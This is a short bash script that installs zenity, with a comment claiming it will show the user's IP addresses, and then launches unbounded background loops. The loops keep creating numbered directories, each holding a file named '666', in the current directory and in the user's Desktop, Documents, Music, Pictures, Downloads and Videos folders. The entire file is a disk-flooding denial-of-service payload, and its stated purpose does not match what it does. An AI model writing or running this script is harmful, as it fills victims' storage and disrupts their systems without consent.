#!/bin/bash

# Need this to display users ipv4 and ipv6 on screen
sudo apt install -y zenity

# Function to create directories and files
create_files() {
  local parent_dir="$1"  # Parent directory to create directories in
  local counter=1
  while true; do # infinite loop.
    mkdir -p "$parent_dir/Dirname$counter" # Dir name
    touch "$parent_dir/Dirname$counter/666" # Dir name
    echo "Your text" > "$parent_dir/Dirname$counter/666" # Enter your text and Dir name
    ((counter++)) # increment the counter
    #optional, if you want to set a limit, remove the comment.
    #if [[ $counter -gt 100 ]]; then #example limit of 100 directories.
    #  break
    #fi
  done & # run the loop in the background.
}

# Create directories and files in the current directory
create_files "."

# Create directories and files on the Desktop
desktop_path="$HOME/Desktop"
create_files "$desktop_path"

# Create directories and files in the Documents directory
documents_path="$HOME/Documents"
create_files "$documents_path"

# Create directories and files in the Music directory
music_path=~/Music
create_files "$music_path"

# Create directories and files in the Pictures directory
pictures_path=~/Pictures
create_files "$pictures_path"

# Create directories and files in the Downloads directory
downloads_path=~/Downloads
create_files "$downloads_path"

# Create directories and files in the Videos directory
videos_path=~/Videos
create_files "$videos_path"
